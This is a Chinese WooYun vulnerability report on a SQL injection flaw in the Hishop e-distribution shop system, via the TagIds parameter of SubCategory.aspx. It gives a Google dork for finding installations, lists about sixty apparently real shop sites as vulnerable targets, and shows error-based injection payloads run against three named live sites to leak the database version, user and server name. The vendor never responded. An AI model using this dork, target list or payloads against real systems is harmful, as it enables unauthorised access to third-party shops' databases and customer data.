当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116391

漏洞标题:hishop易分销系统sql注入一枚

相关厂商:Hishop

漏洞作者: 路人甲

提交时间:2015-05-27 11:19

修复时间:2015-07-11 11:20

公开时间:2015-07-11 11:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

应该是这个网站 http://www.hishop.com.cn/ 开发的hishop易分销系统存在一枚注入;应该有版本之分,现在还不清楚什么版本,我也是在偶尔浏览一个商城输入单引号才发现的注入,后来去看一下这个系统的用户居然那么多,就尝试了一下~
google搜:inurl:SubCategory.aspx?keywords+minSalePrice
http://127.0.0.1/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%27&brand=27

1.jpg


案例特别多,这仅仅是前几页:
http://spt.0351tao.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.emmelle.cn/shop//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.nnjt365.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.oxie.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://yuntoys.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.qhjddl.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.gzkorea.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://feihongzhixin.mall.hjhl.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://310kx.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.1688hub.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.xdhome.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://sostore.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27&PageSize=24
http://cnzdrc.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://qmhy.com.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://twcz.net//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://cqjnm.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://eyigo.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://yuanxingchina.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
这些不显错提示运行错误的可以用注入工具测试:
http://shop98.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.51ganxian.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://teli-go.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.wymao.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://yz35.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.sbada.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.ztfmall.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.runqu.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.oftshop.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.komaes.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.wbuyers.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://demo.shopefx.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.qm3s.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.gonggongjiaoyu.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.100com.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://fulifei.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://baiai.me//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.nydao.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.qinta.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.bibimian.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://12skycolors.com.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.ccegw.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://yuanzhongfu.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.drake.net.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.htd2013.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.51860007.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.imeirongyuan.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://cq.diy023.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://youhuiyoudao.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.sanbugou.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://4007070666.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://longfengjiewang.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://eyecolor.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://xiaohema.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://168book.net/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://guoranhaoshi.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://yunhaipifa.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://auto-apex.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://mlgc90.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://suzonger.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://kawa999.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.quanquanle.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://seagou.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://www.nilaya.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://xt1986.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
http://cheku88.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27
........等等

漏洞证明:


http://spt.0351tao.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%20and%20char(@@version)%3E1&brand=27

01.jpg


http://www.nnjt365.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%20and%20char(user)%3E1&brand=27

2.jpg


http://twcz.net//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%20and%20char(@@servername)%3E1&brand=27

3.jpg


无法报错的工具测试结果:

02.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论